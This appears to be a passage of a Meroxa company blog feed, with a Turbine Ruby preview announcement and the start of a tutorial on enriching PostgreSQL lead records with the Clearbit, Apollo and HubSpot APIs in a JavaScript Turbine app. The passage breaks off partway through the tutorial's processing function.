&lt;p&gt;💡 You can add additional destinations just like we added MongoDB and Confluent Cloud above using &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; . See Resources &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We could also easily extend the processing logic by adding whatever functionality is required into our custom function. This could be as straightforward as reformatting fields or as sophisticated as importing 3rd party packages and leveraging those to transform the records or hitting external APIs to enrich the data.&lt;/p&gt;
&lt;p&gt;💡 For an example on using API’s in Turbine you can read our blog post on APIs &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa Now Streaming on Ruby]]></title><description><![CDATA[Combining Ruby’s simplicity and power with Turbine, Rubyists can now build data streaming apps with development workflows you know and love.]]></description><link>https://meroxa.com/blog/meroxa-now-streaming-on-ruby</link><guid isPermaLink="false">https://meroxa.com/blog/meroxa-now-streaming-on-ruby</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Thu, 01 Dec 2022 21:12:00 GMT</pubDate><content:encoded>&lt;h2&gt;Preview Turbine Ruby&lt;/h2&gt;
&lt;p&gt;We were thrilled to sponsor and attend &lt;a href=&quot;https://rubyconf.org/&quot;&gt;RubyConf 2022&lt;/a&gt; in Houston this week. Our team had an amazing time connecting with and learning from the ruby community, which is why we’re excited to introduce Turbine to Rubyists everywhere. The Turbine application framework was designed for software developers using their preferred programming language to build, test, and deploy data streaming applications. As the world continues to move towards real-time, there’s a growing demand for building sophisticated stream processing applications. Where traditionally this would require separate task specific tooling, new and unfamiliar paradigms, and managing complex services, the Turbine framework streamlines this experience for software developers. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build data streaming apps with development workflows you know and love.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/7h-ePFO1bfZO7uHnB1R0K_lec0vZEtODK0NgvXg9kN7PvEYJry7DZaz6peLRxAqft4kIx1YNkYjZRtr51ZeTHnlP_uN2LkDNPznmMEsMwJXMYLjZuyvbNoa9X-pHM4uO6Er_fgZTE3dxbxEe3xB-k8M7bCl5FGPFWMeacN58okQoUhUUDceeUJcmsFJj&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Tu&lt;strong&gt;RB&lt;/strong&gt;ine Applications&lt;/h2&gt;
&lt;p&gt;The &lt;a href=&quot;https://share.hsforms.com/1s-FMleBKRBWucZB0hkjHAAc2sme&quot;&gt;Turbine Ruby developer preview&lt;/a&gt; will grant you early access to Turbine.rb which is currently in the final stages of feature development. With Turbine.rb developer preview, you can build and deploy a real-time stream processing application using Ruby. The preview will also give you a chance to shape the final stages of feature development with feedback, get pre-release support, and have your application ready prior to launch day.&lt;/p&gt;
&lt;p&gt;Refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;documentation&lt;/a&gt; on how to build and deploy a Turbine app using Ruby.&lt;/p&gt;
&lt;h2&gt;Sign Up for the Developer Preview&lt;/h2&gt;
&lt;p&gt;Turbine Ruby is currently in developer preview with limited functionality. If you wish to participate, sign up &lt;a href=&quot;https://share.hsforms.com/1s-FMleBKRBWucZB0hkjHAAc2sme&quot;&gt;here&lt;/a&gt; and a member of our team will follow up to discuss the steps to get the feature enabled. We love hearing from our users! If you have questions or feedback, please feel free to contact us directly via &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by joining our&lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord community&lt;/a&gt; server.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Using Turbine to call multiple APIs in real-time to transform & enrich data]]></title><description><![CDATA[Use Meroxa Turbine to call multiple APIs in real-time to transform & enrich your data via Clearbit, Apollo and Hubspot]]></description><link>https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data</link><guid isPermaLink="false">https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Fri, 18 Nov 2022 14:19:31 GMT</pubDate><content:encoded>&lt;p&gt;Data enrichment and transformations are essential to making the most of your data. Today, we will look at how Meroxa enables developers of any level to enrich and transform their data using a code-first approach. Typically, other real-time transformation vendors limit the type of data manipulation you can do. They typically take a UI approach which limits you to only doing things that the provider has programmed in. With Meroxa’s real-time streaming capabilities and Turbine’s code-first approach, developers have the power to program their data apps any way they want, using languages they are already familiar with.&lt;/p&gt;
&lt;p&gt;Here are a few examples of what you can do with Turbine in real-time:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You could use a hashing library like &lt;a href=&quot;https://www.npmjs.com/package/string-hash&quot;&gt;string-hash&lt;/a&gt; to hash sensitive customer data. If you want to encrypt certain data you could use &lt;a href=&quot;https://www.npmjs.com/package/crypto-js&quot;&gt;crypto-js&lt;/a&gt; to encrypt sensitive data and store the decryption codes in another data store while keeping it relational.&lt;/li&gt;
&lt;li&gt;If you have data that needs to be validated you could write a custom validation function to be run on each record. For example, Phone Number formats in your database could be matched to pass a validation check. Furthermore, you could use a 3rd party API such as &lt;a href=&quot;https://www.twilio.com/docs/lookup/tutorials/validation-and-formatting&quot;&gt;Twilio&lt;/a&gt; or &lt;a href=&quot;https://developers.telnyx.com/docs/api/v1/lrn-data/Extended-LRN-lookup&quot;&gt;Telynx&lt;/a&gt; to enrich each phone number in your database.&lt;/li&gt;
&lt;li&gt;You can use any API to enrich your data. We’ve seen developers use the Google Maps API to enrich address data to validate and format an address that is easily sharable amongst services.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;In today&apos;s example, we are going to be focusing on how easy Turbine makes it for developers to call multiple APIs to enrich sales data. This application will take a company name (ex: Apple) from PostgreSQL (really, it can be from any data source) and run each record through a series of API calls. Within Turbine, we will be calling the &lt;a href=&quot;https://clearbit.com/blog/company-name-to-domain-api&quot;&gt;Clearbit API to get the domain name for the company&lt;/a&gt; (ex: Apple → &lt;a href=&quot;http://Apple.com&quot;&gt;Apple.com&lt;/a&gt;), then get contact information on employees at the company using &lt;a href=&quot;https://apolloio.github.io/apollo-api-docs/?shell#search&quot;&gt;Apollo’s Search API&lt;/a&gt; (ex: Getting Apple’s CEO, CIO, CFO), and finally, we will &lt;a href=&quot;https://legacydocs.hubspot.com/docs/methods/contacts/create_contact&quot;&gt;create a HubSpot contact&lt;/a&gt; for those employees. Later, we will &lt;a href=&quot;https://legacydocs.hubspot.com/docs/methods/lists/add_contact_to_list&quot;&gt;add those Hubspot contacts to a list&lt;/a&gt; and dump the data into Snowflake for further analysis and also write it to a Confluent Cloud-managed Kafka cluster for real-time use cases such as personalized outreach. Here is a visual on how this will work:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts%20(2).png&quot; alt=&quot;Flowcharts (2)&quot;&gt;&lt;/p&gt;
&lt;h2&gt;The Code&lt;/h2&gt;
&lt;p&gt;We will use the Javascript &lt;a href=&quot;https://docs.meroxa.com/beta-overview&quot;&gt;Turbine&lt;/a&gt; framework to get records with company names from PostgreSQL, run each record through a series of API calls, and write them to Snowflake and Kafka.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa also supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go/&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby/&quot;&gt;Ruby&lt;/a&gt; with many more languages coming!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://quickstarts.snowflake.com/guide/getting_started_with_snowflake/index.html#0&quot;&gt;Snowflake DB (Optional)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Confluent Cloud Kafka Cluster (Optional)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;Once you have created a &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; account and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you can follow the following steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI. You can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and SnowflakeDB resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring your Postgres&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;leadsapp_pg&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create leadsapp_pg &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \\\\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Snowflake&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Guide on setting up Snowflake&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below, we are creating a Snowflake DB connection named &lt;code class=&quot;language-text&quot;&gt;snowflake&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; snowflakedb &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;snowflake://&lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_URL&lt;/span&gt;/meroxa_db/stream_data&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;--username&lt;/span&gt; meroxa_user &lt;span class=&quot;token parameter variable&quot;&gt;--password&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Apache Kafka&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/confluentcloud&quot;&gt;Guide on setting up Confluent Cloud/Kafka&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Here we are creating a Kafka connection named &lt;code class=&quot;language-text&quot;&gt;apachekafka&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type kafka \\
  --url &quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot; \\&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 Meroxa Data apps do not necessarily need destination resources. If you would just like to read data from a source like PostgreSQL and call APIs you can skip the above.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine in Javascript&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init leadsapp &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our Resources&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;leadsapp&lt;/code&gt; folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;leadsapp_pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;leads&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, Process each record that comes in! ProcessData is our function that will call the APIs (See more below)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;processData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Fourth, identify your Snowflake DB &amp;amp; Kafka source name configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destinationSnowflake &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;snowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destinationKafka &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;apachekafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which table or topic to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destinationSnowflake&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leads_from_pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destinationKafka&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leads_from_pg_topic&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our APIs&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;await turbine.process&lt;/code&gt; allows us to write a function that runs on each record. Here we can call our Clearbit, Apollo &amp;#x26; HubSpot APIs in real-time.&lt;/p&gt;
&lt;p&gt;💡 This code can be found the apps Github repo &lt;a href=&quot;https://github.com/meroxa/leadsapp&quot;&gt;here&lt;/a&gt;. The functions used to make the API calls are in the Github repo here: &lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/clearbit.js&quot;&gt;getDomainNameFromClearbit&lt;/a&gt;&lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/apollo.js&quot;&gt;getContactsFromApollo&lt;/a&gt;&lt;a href=&quot;https://github.com/meroxa/leadsapp/blob/main/hubspot.js&quot;&gt;_generateContactDataForHubspot createHubspotContact addHubspotContactToList&lt;/a&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;processData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Loop through each Postgres record&lt;/span&gt;
  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Extract the company name from the Postgres row (Ex: Apple)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; companyName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;company_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] companyName:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;companyName &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; companyName&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get companyName from record. companyName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get companyName from record. companyName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Get the company&apos;s Domain Name (Ex: Apple -&gt; Apple.com)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; domainName &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getDomainNameFromClearbit&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;companyName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
